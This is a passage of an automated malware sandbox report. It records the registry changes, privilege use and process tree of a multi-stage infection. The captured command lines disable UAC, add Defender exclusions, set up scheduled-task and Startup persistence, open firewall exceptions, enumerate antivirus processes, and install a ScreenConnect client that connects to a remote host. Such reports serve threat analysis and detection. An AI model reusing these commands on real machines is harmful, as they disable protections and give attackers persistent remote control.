| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\a\1.exe
"C:\Users\Admin\AppData\Local\Temp\a\1.exe"
C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
C:\Users\Admin\AppData\Local\Temp\a\Update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"
C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"
C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\windows.exe
"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe
"C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe"
C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
"C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe" -burn.filehandle.attached=688 -burn.filehandle.self=540
C:\Users\Admin\AppData\Local\Temp\a\T.exe
"C:\Users\Admin\AppData\Local\Temp\a\T.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1347DC49D48561C4A02CAEABAB78B4B1 C
C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe
"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC10E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240632515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"
C:\Users\Admin\AppData\Local\Temp\a\access.exe
"C:\Users\Admin\AppData\Local\Temp\a\access.exe"
C:\ProgramData\Bitdefender\$77-Bitdefender.exe
C:\ProgramData\Bitdefender\$77-Bitdefender.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "opssvc wrsa"
C:\Users\Admin\AppData\Local\Temp\a\36.exe
"C:\Users\Admin\AppData\Local\Temp\a\36.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4552 -ip 4552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 364
C:\Users\Admin\AppData\Local\Temp\a\99999.exe
"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"
C:\Users\Admin\AppData\Local\Temp\a\22.exe
"C:\Users\Admin\AppData\Local\Temp\a\22.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD1C7.tmp.bat""
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe
"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"
C:\Users\Admin\AppData\Local\Temp\a\Network.exe
"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\rea.exe
"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe
"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpEF71.tmp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF50F.tmp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e6TONnwlRjZT.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 812A33CB12312E6462786B39941DA2A5
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8849EAC97ADA90BEB9C92DE240009D0C E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=a205822a-25dd-4182-ae48-34f1f8dfcbcd&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "791a6c20-0820-417e-b3aa-8d215157e49c" "User"
C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe
"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'
C:\Users\Admin\AppData\Local\Temp\a\mod.exe
"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\Server.exe
"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "d3f4f0ef-3603-4e14-afcf-b85b775e7c43" "System"
C:\Users\Admin\AppData\Local\Temp\a\Client.exe
"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Local\Temp\a\jij.exe
"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"
C:\Users\Admin\AppData\Local\Temp\a\333.exe
"C:\Users\Admin\AppData\Local\Temp\a\333.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SdKVUC2UF3Oy.bat" "
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xnAULEnVoqrp.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vaS5Lj59HSh3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9PZb2XeKo2Ov.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UvCM9DTMx1PL.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NHugTaed4e2t.bat" "
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
